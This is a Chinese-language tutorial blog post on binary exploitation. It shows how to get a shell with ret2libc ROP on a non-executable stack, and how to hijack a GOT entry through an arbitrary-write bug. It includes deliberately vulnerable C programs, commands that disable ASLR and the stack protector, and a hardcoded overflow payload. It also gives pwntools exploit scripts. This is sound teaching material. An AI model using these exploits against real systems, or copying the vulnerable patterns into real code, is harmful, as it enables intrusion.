

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/newtubiao.png">
  <link rel="icon" href="/img/newtubiao.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Asteri5m">
  <meta name="keywords" content="">
  <meta name="description" content="0x00 前言&amp;准备工作该篇是基于前一篇的基础之上所做的研究。上一篇中，因为程序没有system所以导致需要我们构造自己的shellcode，但是前提是栈可执行，该篇研究的是在栈不可执行的情况下如何获取shell 准备工作还是上一篇差不多，先关闭操作系统的地址空间随机化（ASLR），这是针对栈溢出漏洞被操作系统广泛采用的防御措施。关闭该防御来降低学习复现的难度。需要root执行。 12#">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn入门到放弃4-ROP绕过栈可执行保护与GOT表劫持">
<meta property="og:url" content="http://asteri5m.icu/archives/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%834-ROP%E7%BB%95%E8%BF%87%E6%A0%88%E5%8F%AF%E6%89%A7%E8%A1%8C%E4%BF%9D%E6%8A%A4%E4%B8%8EGOT%E8%A1%A8%E5%8A%AB%E6%8C%81.html">
<meta property="og:site_name" content="Asteri5m">
<meta property="og:description" content="0x00 前言&amp;准备工作该篇是基于前一篇的基础之上所做的研究。上一篇中，因为程序没有system所以导致需要我们构造自己的shellcode，但是前提是栈可执行，该篇研究的是在栈不可执行的情况下如何获取shell 准备工作还是上一篇差不多，先关闭操作系统的地址空间随机化（ASLR），这是针对栈溢出漏洞被操作系统广泛采用的防御措施。关闭该防御来降低学习复现的难度。需要root执行。 12#">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308181904443.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309103500782.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309111024263.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309144809229.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309151454526.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309151630963.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309153159354.png">
<meta property="article:published_time" content="2022-03-09T07:38:25.000Z">
<meta property="article:modified_time" content="2022-03-09T07:41:00.780Z">
<meta property="article:author" content="Asteri5m">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308181904443.png">
  
    <meta name="baidu-site-verification" content="code-GBSY8p4qe6" />
  
  <title>pwn入门到放弃4-ROP绕过栈可执行保护与GOT表劫持 - Asteri5m</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/atom-one-dark.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer@1.10.0/dist/APlayer.min.css">
<link rel="stylesheet" href="/xm_custom/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"asteri5m.icu","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":120,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":3},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"5INqyf5xMrWdsn0whn39qjsu-gzGzoHsz","app_key":"6UTAOxyJnjvDwHX3PJagKMg9","server_url":"https://5inqyf5x.lc-cn-n1-shared.com","path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Asteri5m</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/guestbook/">
                <i class="iconfont icon-note"></i>
                留言板
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" false
         style="background: url('/img/none.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="pwn入门到放弃4-ROP绕过栈可执行保护与GOT表劫持">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-09 15:38" pubdate>
        2022年3月9日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.1k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      13 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">pwn入门到放弃4-ROP绕过栈可执行保护与GOT表劫持</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：几秒前
                
              </p>
            
            <div class="markdown-body">
              <h2 id="0x00-前言-amp-准备工作"><a href="#0x00-前言-amp-准备工作" class="headerlink" title="0x00 前言&amp;准备工作"></a>0x00 前言&amp;准备工作</h2><p>该篇是基于前一篇的基础之上所做的研究。上一篇中，因为程序没有system所以导致需要我们构造自己的shellcode，但是前提是栈可执行，该篇研究的是在栈不可执行的情况下如何获取shell</p>
<p>准备工作还是上一篇差不多，先关闭操作系统的地址空间随机化（ASLR），这是针对栈溢出漏洞被操作系统广泛采用的防御措施。关闭该防御来降低学习复现的难度。需要root执行。</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># 注意，下面是临时修改方案，系统重启后会被重置为2</span><br><span class="hljs-built_in">echo</span> 0 &gt; /proc/sys/kernel/randomize_va_space<br></code></pre></div></td></tr></table></figure>

<p>随手写一个作为测试使用(pwn_rop)</p>
<figure class="highlight c"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">//这个作为ROP绕过复现源码</span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span><span class="hljs-meta-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span><span class="hljs-meta-string">&lt;string.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">int</span> argc,<span class="hljs-keyword">char</span>* argv[])</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">char</span> buf[<span class="hljs-number">128</span>];<br>	<span class="hljs-built_in">strcpy</span>(argv[<span class="hljs-number">1</span>],buf);<br>	<span class="hljs-built_in">puts</span>(buf);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>编译成32位的程序，这次只关闭栈保护不打开栈的可执行（坑：这里必须使用gcc）</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">gcc -g -m32 -O0 -fno-stack-protector [源文件名] -o [可执行文件名]<br></code></pre></div></td></tr></table></figure>

<p>参数说明：</p>
<ul>
<li>-g：在可执行文件中加入源码信息（gdb必要条件）</li>
<li>-O0：关闭所有优化</li>
<li>-m32：使用32位编译</li>
<li>-fno-stack-protector：关闭栈保护</li>
<li>-z execstack：启用栈上代码可执行</li>
</ul>
<hr>
<p>再另一个got_hacking，选自长亭科技相关分享，因为是一个特别典型和简单的got_hacking，非常适合入门</p>
<figure class="highlight c"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">//劫持got表复现源码</span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">win</span><span class="hljs-params">()</span> </span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;You Win!&quot;</span>);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> addr, value;<br>    <span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%x=%x&quot;</span>, &amp;addr, &amp;value);<br>    *(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> *)addr = value;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;set %x=%x\n&quot;</span>, addr, value);<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>编译命令</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">clang -m32 *.c -o pwn_got_hack<br></code></pre></div></td></tr></table></figure>

<p>文件命名无所谓，可以看到并未添加-z relro -z now(完全关闭)编译参数，这就为GOT表劫持提供了可能。</p>
<h2 id="0x10-ROP绕过栈攻击"><a href="#0x10-ROP绕过栈攻击" class="headerlink" title="0x10 ROP绕过栈攻击"></a>0x10 ROP绕过栈攻击</h2><h3 id="0x11-什么是ROP"><a href="#0x11-什么是ROP" class="headerlink" title="0x11 什么是ROP"></a>0x11 什么是ROP</h3><p>在前一篇中，是通过利用栈溢出漏洞，将一段自行构造的shellcode放置在栈上特定位置，并使得函数的返回值跳转到该段代码的地址执行，从而获得shell。但是这要求可以在栈上执行代码，现在栈上可执行代码被关闭了，这就要求我们要想办法跳转到可以执行代码的地方。我们看到程序引用了libc库的函数（两句include语句），libc库中显然包含有system函数，那么我们将可以把函数返回的地址指向libc中的system地址，从而跳转到库函数去执行。<strong>这种使用函数返回地址(ret指令)连接代码的技术，就叫做ROP(Return-Oriented Programming，返回导向编程)。</strong></p>
<p>ROP特性：甚至可以通过在栈上布置一系列内存地址，每个内存地址布置一个gadget(以ret&#x2F;jmp&#x2F;call等指令结尾的一段汇编指令)，从而实现程序的依次执行。另外很重要的一点是，我们在栈上写入的都是<strong>内存地址</strong>，并非需要执行的代码，使得这种方式可以有效的绕过NX保护。</p>
<h3 id="0x12-攻击思路"><a href="#0x12-攻击思路" class="headerlink" title="0x12 攻击思路"></a>0x12 攻击思路</h3><p>我们需要如下计算步骤：</p>
<ol>
<li>找出buf变量地址。</li>
<li>找出main函数返回地址。</li>
<li>计算面函数返回地址与buf变量地址2者的偏移量，用于填充padding。<br><strong>上述三步与前一篇一致</strong></li>
<li>找出libc中system函数、”&#x2F;bin&#x2F;sh”地址。</li>
<li>padding后填充addr(system) + 4位任意地址 + addr(&#x2F;bin&#x2F;sh)</li>
</ol>
<p>思路明确，我们现在开始来逐步调试。前面3步的过程与第三节相同，并且前面两步的目的就是为了第三步计算偏移，所以可以使用cyclic快速找到</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308181904443.png" srcset="/img/loading.gif" lazyload></p>
<p>当前需要来调试libc中地址获取，这里直接使程序溢出，然后程序程序就会异常然后中断，才能搜到 <code>/bin/sh</code></p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">gdb -q -args ./pwn_rop $(python3 -c <span class="hljs-string">&quot;print(&#x27;a&#x27;*200)&quot;</span>)<br>gdb-peda$ starti<br>gdb-peda$ r<br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309103500782.png" srcset="/img/loading.gif" lazyload></p>
<p>得到system的地址为：0xf7e0b370，”&#x2F;bin&#x2F;sh”字符的地址为：0xF7F55363。于是我们构造payload为：<br>“a” * 136 + “0xf7e0b370” + “\1\1\1\1” + “0xF7F55363”</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">gdb -q -args ./pwn_rop $(python3 -c <span class="hljs-string">&quot;print(&#x27;a&#x27;*136+&#x27;\x70\xb3\xe0\xf7&#x27;+&#x27;\1\1\1\1&#x27;+&#x27;\x63\x53\xf5\xf7&#x27;)&quot;</span>)<br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309111024263.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="0x13-pwntools实现"><a href="#0x13-pwntools实现" class="headerlink" title="0x13 pwntools实现"></a>0x13 pwntools实现</h3><figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">&quot;debug&quot;</span> <span class="hljs-comment">#show debug information</span><br><br>offset = <span class="hljs-number">136</span><br><br>system_addr = <span class="hljs-number">0xf7e0b370</span><br>binsh_addr = <span class="hljs-number">0xF7F55363</span><br>                    <br>payload = <span class="hljs-string">b&#x27;a&#x27;</span> * offset + p32(system_addr) + <span class="hljs-string">b&#x27;\1\1\1\1&#x27;</span> + p32(binsh_addr)<br><br>p = process(argv = [<span class="hljs-string">&#x27;./pwn_rop&#x27;</span>,payload])<br><br><span class="hljs-built_in">print</span>(payload)<br><br>p.interactive()<br></code></pre></div></td></tr></table></figure>

<h2 id="0x20-GOT表劫持"><a href="#0x20-GOT表劫持" class="headerlink" title="0x20 GOT表劫持"></a>0x20 GOT表劫持</h2><p>关于劫持got表技术，在第二篇中有提到，这里详细研究一下。</p>
<h3 id="0x21-GOT表介绍"><a href="#0x21-GOT表介绍" class="headerlink" title="0x21 GOT表介绍"></a>0x21 GOT表介绍</h3><p><strong>知识点1</strong></p>
<ul>
<li><p>got中存放的是外部全局变量的GOT表，例如<code>stdin/stdout/stderr</code>，非延时绑定。</p>
</li>
<li><p>got.plt中存放的是外部函数的GOT表，例如<code>printf</code>函数，延时绑定。</p>
</li>
</ul>
<p><strong>知识点2</strong></p>
<p>GOT劫持2大要素：GOT表可写(checksec显示RELRO&#x2F;disabled且Flg标志位显示为WA)与内存漏洞。</p>
<h3 id="0x22-GOT表劫持核心思想"><a href="#0x22-GOT表劫持核心思想" class="headerlink" title="0x22 GOT表劫持核心思想"></a>0x22 GOT表劫持核心思想</h3><p>GOT表劫持的核心目的是通过修改GOT表中的函数地址为其他我们期望的地址，从而达到执行该函数时，通过跳转到GOT表，从而跳转到我们修改过的地址去执行指令。</p>
<h3 id="0x23-Got查看方法"><a href="#0x23-Got查看方法" class="headerlink" title="0x23 Got查看方法"></a>0x23 Got查看方法</h3><ul>
<li><p>查看got表是否可写</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">readelf -S [program]<br></code></pre></div></td></tr></table></figure></li>
</ul>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309144809229.png" srcset="/img/loading.gif" lazyload></p>
<ul>
<li><p>查看got表中的函数地址</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">odjdump -R [program]<br></code></pre></div></td></tr></table></figure>
</li>
<li><p>pwntools中查看(这里在第二篇中有提到)</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-built_in">hex</span>(elf.got[<span class="hljs-string">&quot;printf&quot;</span>])<br></code></pre></div></td></tr></table></figure></li>
</ul>
<h3 id="0x24-程序分析"><a href="#0x24-程序分析" class="headerlink" title="0x24 程序分析"></a>0x24 程序分析</h3><ol>
<li>程序的目的是为了执行win函数，但是从main函数中并无入口调用win函数，所以我们需要想办法控制指令跳转到win函数的地址执行。</li>
<li>scanf(“%x&#x3D;%x”, &amp;addr, &amp;value); — 以16进制按{}&#x3D;{}的格式读入2个数，分别写入addr和value。</li>
<li><em>(unsigned int</em> )addr &#x3D; value; — 关键语句：<br>(unsigned int <em>)addr — 将addr强制转化为指针类型，此时(unsigned int</em> )addr表示的是内存地址addr<br><em>(unsigned int</em> )addr &#x3D; value; — 将内存地址addr处的内容改写为value<br><strong>所以这里存在4字节&#x3D;32bit的任意内存写入漏洞。</strong></li>
</ol>
<h3 id="0x25-攻击思路"><a href="#0x25-攻击思路" class="headerlink" title="0x25 攻击思路"></a>0x25 攻击思路</h3><ol>
<li><p>读取win函数的地址。</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># 读取办法1：gdb中打印</span><br>gdb-peda$ p win<br><span class="hljs-comment"># 外部读取</span><br>objdump -d pwn_got_hack|grep win<br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309151454526.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p>从got表中读取printf函数的地址。</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">objdump -R pwn_got_hack<br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309151630963.png" srcset="/img/loading.gif" lazyload></p>
<p>objdump工具：</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">objdump是linux反汇编指令。<br>-d(disassemble): 可以显示反汇编后的汇编代码。<br>-R(dynamic-reloc): 显示文件的动态重定位入口，可以用于查找libc等共享库。<br></code></pre></div></td></tr></table></figure>
</li>
<li><p>输入时利用内存泄露漏洞将printf函数的地址指向win函数。</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># 输入addr(printf)=addr(win)，注意这里的地址不同环境不同</span><br>0x0804c00c=0x80491a0<br></code></pre></div></td></tr></table></figure>

<p>显示win。</p>
</li>
</ol>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220309153159354.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="0x26-pwntools实现"><a href="#0x26-pwntools实现" class="headerlink" title="0x26 pwntools实现"></a>0x26 pwntools实现</h3><figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">&quot;debug&quot;</span> <span class="hljs-comment">#show debug information</span><br><br>p = process(<span class="hljs-string">&quot;./pwn_got_hack&quot;</span>)<br>elf = ELF(<span class="hljs-string">&quot;./pwn_got_hack&quot;</span>)<br><span class="hljs-comment"># 获取win函数地址</span><br>win_addr = <span class="hljs-built_in">hex</span>(elf.symbols[<span class="hljs-string">&#x27;win&#x27;</span>])<br><span class="hljs-comment"># 从got表中获取printf函数地址</span><br>printf_got = <span class="hljs-built_in">hex</span>(elf.got[<span class="hljs-string">&#x27;printf&#x27;</span>])<br><span class="hljs-built_in">print</span> (<span class="hljs-string">&quot;win_addr: &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(win_addr))<br><span class="hljs-built_in">print</span> (<span class="hljs-string">&quot;printf_got: &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(printf_got))<br> <br>payload = printf_got + <span class="hljs-string">&quot;=&quot;</span> + win_addr<br><span class="hljs-built_in">print</span> (<span class="hljs-string">&quot;payload: &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(payload))<br><br>p.sendline(payload)<br><br><span class="hljs-built_in">print</span>(p.recvall())<br></code></pre></div></td></tr></table></figure>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Pwn%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Pwn基础知识</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Pwn/">Pwn</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/archives/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%833-%E6%B2%A1%E6%9C%89system%E4%B9%8B%E6%9E%84%E9%80%A0%E8%87%AA%E5%B7%B1%E7%9A%84shellcode.html">
                        <span class="hidden-mobile">pwn入门到放弃3-没有system之构造自己的shellcode</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/gh/HCLonely/Valine@latest/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"5INqyf5xMrWdsn0whn39qjsu-gzGzoHsz","appKey":"6UTAOxyJnjvDwHX3PJagKMg9","path":"window.location.pathname","placeholder":"输入QQ号我就能获取你的企鹅昵称和头像啦~","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true,"tagMeta":["博主","小伙伴","访客"],"master":"3bbfd45c0631973d5196327805f62511","friends":["2012b2da9e0852350b42a9c21823f3cf","641f794b535aea2ebe2ad543ec35e2f8"]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
